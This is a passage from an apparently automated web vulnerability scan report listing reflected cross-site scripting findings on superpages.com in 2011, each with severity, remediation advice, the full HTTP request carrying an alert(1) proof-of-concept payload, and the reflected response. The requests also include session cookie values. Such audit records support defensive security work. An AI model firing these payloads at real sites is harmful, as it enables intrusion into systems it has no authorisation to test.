<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head
...[SNIP]...
<link media="screen, projection" type="text/css" HREF="http://www.superpages.com/css/header.css?SRC=&ab2fa"><script>alert(1)</script>887ac555049=1" rel="stylesheet" />
...[SNIP]...

4.512. http://www.superpages.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.superpages.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c040f'-alert(1)-'b2565b0ba7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?c040f'-alert(1)-'b2565b0ba7=1 HTTP/1.1
Host: www.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=68DE2DCAFDD7D20B297AC05CB654492B; s_lastvisit=1296748870245; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 17:07:16 GMT
Server: Unspecified
Vary: Host
Connection: close
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 17:22:16 GMT;path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head
...[SNIP]...
<a HREF="http://mapserver.superpages.com/mapbasedsearch/?spheader=true&L='+L_encoded+'&SRC=&c040f'-alert(1)-'b2565b0ba7=1" rel="nofollow">
...[SNIP]...

4.513. http://www.superpages.com/bp/Facebook [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.superpages.com
Path:   /bp/Facebook

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ce45f"-alert(1)-"161ba1e0a00 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bp/Facebookce45f"-alert(1)-"161ba1e0a00 HTTP/1.1
Host: www.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=68DE2DCAFDD7D20B297AC05CB654492B; s_lastvisit=1296748870245; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;

Response

HTTP/1.1 200 OK
Server: Unspecified
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Set-Cookie: JSESSIONID=F81968BB9B8C6E79A245B67095187467; Path=/
Set-Cookie: web=; Domain=.superpages.com; Path=/
Set-Cookie: shopping=; Domain=.superpages.com; Path=/
Set-Cookie: yp=; Domain=.superpages.com; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 57268
Date: Thu, 03 Feb 2011 17:06:18 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<script language="JavaScript" type="text/javascript">
document.cookie="OpenPhones=";
</script>
<h
...[SNIP]...
ellowpages.superpages.com';
var var_account = 'Superpagescom';
var hostServ = 'http://www.superpages.com';
var searchtype="two";
searchtype="one";
var actualUrl = "http://www.superpages.com/bp/Facebookce45f"-alert(1)-"161ba1e0a00?=";
var client_id = "133515049997773";
var redirecturl = 'http://yellowpages.superpages.com/Facebook';
//-->
...[SNIP]...

4.514. http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm [PGID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.superpages.com
Path:   /bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm

Issue detail

The value of the PGID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e44e9"-alert(1)-"ac1eec3d3bf was submitted in the PGID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855e44e9"-alert(1)-"ac1eec3d3bf&bidType=CLIK&TR=1 HTTP/1.1
Host: www.superpages.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Unspecified
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Set-Cookie: SPC=1296750566133-www.superpages.com-18392944-855020; Domain=.superpages.com; Expires=Tue, 02-Feb-2016 16:29:26 GMT; Path=/
Set-Cookie: JSESSIONID=15DD6E10C9F988449C56134A74598F9A; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:29:25 GMT
Content-Length: 66686

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<title>Ally Bank in Philad
...[SNIP]...
ype="two";
searchtype="two";
var actualUrl = "http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855e44e9"-alert(1)-"ac1eec3d3bf&bidType=CLIK&TR=1";
var client_id = "133515049997773";
var redirecturl = 'http://www.superpages.com/bp/Facebook?prev=yp_profile';
//-->
...[SNIP]...

4.515. http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.superpages.com
Path:   /bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9f735"-alert(1)-"5e13c75896f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bp/US9f735"-alert(1)-"5e13c75896f/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 HTTP/1.1
Host: www.superpages.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Unspecified
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Set-Cookie: SPC=1296750717878-www.superpages.com-25570824-638833; Domain=.superpages.com; Expires=Tue, 02-Feb-2016 16:31:57 GMT; Path=/
Set-Cookie: JSESSIONID=5C32A1099510A145A292891057754A90; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:31:57 GMT
Content-Length: 66498

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<title>Ally Bank in Philad
...[SNIP]...
tp://yellowpages.superpages.com';
var var_account = 'Superpagescom';
var hostServ = 'http://www.superpages.com';
var searchtype="two";
searchtype="two";
var actualUrl = "http://www.superpages.com/bp/US9f735"-alert(1)-"5e13c75896f/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1";
var client_id = "133515049997773";
var redirecturl = 'ht
...[SNIP]...

4.516. http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.superpages.com
Path:   /bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bb7a3"-alert(1)-"d9426b3b370 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htmbb7a3"-alert(1)-"d9426b3b370?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 HTTP/1.1
Host: www.superpages.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Unspecified
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Set-Cookie: SPC=1296750760787-www.superpages.com-11101702-780397; Domain=.superpages.com; Expires=Tue, 02-Feb-2016 16:32:40 GMT; Path=/
Set-Cookie: JSESSIONID=82629E94B8FADDDBFF9B5C6A1B6BECC4; Path=/
Set-Cookie: web=; Domain=.superpages.com; Path=/
Set-Cookie: shopping=; Domain=.superpages.com; Path=/
Set-Cookie: yp=; Domain=.superpages.com; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:32:40 GMT
Content-Length: 18489

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<script language="JavaScript" type="text/javascript">
document.cookie="OpenPhones=";
</script>
<h
...[SNIP]...
gescom';
var hostServ = 'http://www.superpages.com';
var searchtype="two";
searchtype="two";
var actualUrl = "http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htmbb7a3"-alert(1)-"d9426b3b370?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1";
var client_id = "133515049997773";
var redirecturl = 'http://yellowpages.superpages.com/Facebook';
//-->
...[SNIP]...

4.517. http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm [SRC parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.superpages.com
Path:   /bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm

Issue detail

The value of the SRC request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3ebe9"%3balert(1)//fc3f4c0a516 was submitted in the SRC parameter. This input was echoed as 3ebe9";alert(1)//fc3f4c0a516 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a3ebe9"%3balert(1)//fc3f4c0a516&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 HTTP/1.1
Host: www.superpages.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Unspecified
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Set-Cookie: SPC=1296750452826-www.superpages.com-16809597-702534; Domain=.superpages.com; Expires=Tue, 02-Feb-2016 16:27:32 GMT; Path=/
Set-Cookie: JSESSIONID=4CDE972A6F7062265EBD4234C3250381; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:27:33 GMT
Content-Length: 126537

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
ww.superpages.com";
s.prop5 = "Advanced Search, Business Profile";
s.prop9 = "Advanced Search";
s.eVar23 = "Advanced Search";
s.hier1 = "Advanced Search, Business Profile";
var s_campaign = "comlocal1a3ebe9";alert(1)//fc3f4c0a516";
if(s_campaign){
s.campaign = s_campaign;
}
var s_code = s.t();
if(s_code)
document.writeln(s_code);
//-->
...[SNIP]...

4.518. http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm [SRC parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.superpages.com
Path:   /bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm

Issue detail

The value of the SRC request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8c3a4"style%3d"x%3aexpression(alert(1))"d28cbb2cb02 was submitted in the SRC parameter. This input was echoed as 8c3a4"style="x:expression(alert(1))"d28cbb2cb02 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a8c3a4"style%3d"x%3aexpression(alert(1))"d28cbb2cb02&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 HTTP/1.1
Host: www.superpages.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Unspecified
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Set-Cookie: SPC=1296750439498-www.superpages.com-4789827-628076; Domain=.superpages.com; Expires=Tue, 02-Feb-2016 16:27:19 GMT; Path=/
Set-Cookie: JSESSIONID=8C15D1E521D5C7BAD68D0A53F9577955; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:27:18 GMT
Content-Length: 128435

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<a href="http://yellowpages.superpages.com/profiler/abook.jsp?requestAction=toBusinesses&SRC=comlocal1a8c3a4"style="x:expression(alert(1))"d28cbb2cb02" rel="nofollow" onClick="clickTrackTabs('GT','MySuperpages', 'yp_profile');">
...[SNIP]...

4.519. http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm [TR parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.superpages.com
Path:   /bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm

Issue detail

The value of the TR request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 843a2"-alert(1)-"a8e7c8583e3 was submitted in the TR parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1843a2"-alert(1)-"a8e7c8583e3 HTTP/1.1
Host: www.superpages.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 500 Internal Server Error
Server: Unspecified
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Set-Cookie: SPC=1296750623993-www.superpages.com-28426864-914831; Domain=.superpages.com; Expires=Tue, 02-Feb-2016 16:30:23 GMT; Path=/
Set-Cookie: JSESSIONID=265FBF1301E359B78C423E3003AF80EE; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:30:23 GMT
Connection: close
Content-Length: 23380


<!--
-->
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">
<head>
<title>
Superpages.com
...[SNIP]...
ype="two";
var actualUrl = "http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1843a2"-alert(1)-"a8e7c8583e3";
var client_id = "133515049997773";
var redirecturl = 'http://yellowpages.superpages.com/Facebook';
//-->
...[SNIP]...

4.520. http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm [bidType parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.superpages.com
Path:   /bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm

Issue detail

The value of the bidType request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b5dd4"-alert(1)-"d9f9799ecf8 was submitted in the bidType parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIKb5dd4"-alert(1)-"d9f9799ecf8&TR=1 HTTP/1.1
Host: www.superpages.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Unspecified
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Set-Cookie: SPC=1296750603809-www.superpages.com-9081164-800011; Domain=.superpages.com; Expires=Tue, 02-Feb-2016 16:30:03 GMT; Path=/
Set-Cookie: JSESSIONID=219F120FEB2F8290C38E110E827DE695; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:30:03 GMT
Content-Length: 66496

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<title>Ally Bank in Philad
...[SNIP]...
archtype="two";
var actualUrl = "http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIKb5dd4"-alert(1)-"d9f9799ecf8&TR=1";
var client_id = "133515049997773";
var redirecturl = 'http://www.superpages.com/bp/Facebook?prev=yp_profile';
//-->
...[SNIP]...

4.521. http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm [lbp parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.superpages.com
Path:   /bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm

Issue detail

The value of the lbp request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f71cf"-alert(1)-"8b1ed61181f was submitted in the lbp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1f71cf"-alert(1)-"8b1ed61181f&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 HTTP/1.1
Host: www.superpages.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Unspecified
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Set-Cookie: SPC=1296750510916-www.superpages.com-5233303-969715; Domain=.superpages.com; Expires=Tue, 02-Feb-2016 16:28:30 GMT; Path=/
Set-Cookie: JSESSIONID=742BF78E1A6BFC3ABF53A5C98640882B; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:28:30 GMT
Content-Length: 60956

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<title>Ally Bank - Handlin
...[SNIP]...
= 'http://www.superpages.com';
var searchtype="two";
searchtype="two";
var actualUrl = "http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1f71cf"-alert(1)-"8b1ed61181f&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1";
var client_id = "133515049997773";
var redirecturl = 'http://www.superpages.com/bp/Facebook?prev=yp_profile';
//-->
...[SNIP]...

4.522. http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.superpages.com
Path:   /bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7992e"-alert(1)-"47024e3844d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1&7992e"-alert(1)-"47024e3844d=1 HTTP/1.1
Host: www.superpages.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Unspecified
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Set-Cookie: SPC=1296750649070-www.superpages.com-20879668-932317; Domain=.superpages.com; Expires=Tue, 02-Feb-2016 16:30:49 GMT; Path=/
Set-Cookie: JSESSIONID=3B2D663DFEFD640AA8C05C35E7490265; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:30:48 GMT
Content-Length: 23390


<!--
-->
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">
<head>
<title>
Superpages.com
...[SNIP]...
pe="two";
var actualUrl = "http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1&7992e"-alert(1)-"47024e3844d=1";
var client_id = "133515049997773";
var redirecturl = 'http://yellowpages.superpages.com/Facebook';
//-->
...[SNIP]...

4.523. http://www.superpages.com/bp/xmlproxy [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.superpages.com
Path:   /bp/xmlproxy

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f53dc"-alert(1)-"b9a871a93d9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bp/xmlproxyf53dc"-alert(1)-"b9a871a93d9?url=http%3A%2F%2Fugc-int.superpages.com%2Fugcwiki%2FGetPhotoServlet%3FlistingId%3D2118363360 HTTP/1.1
Host: www.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
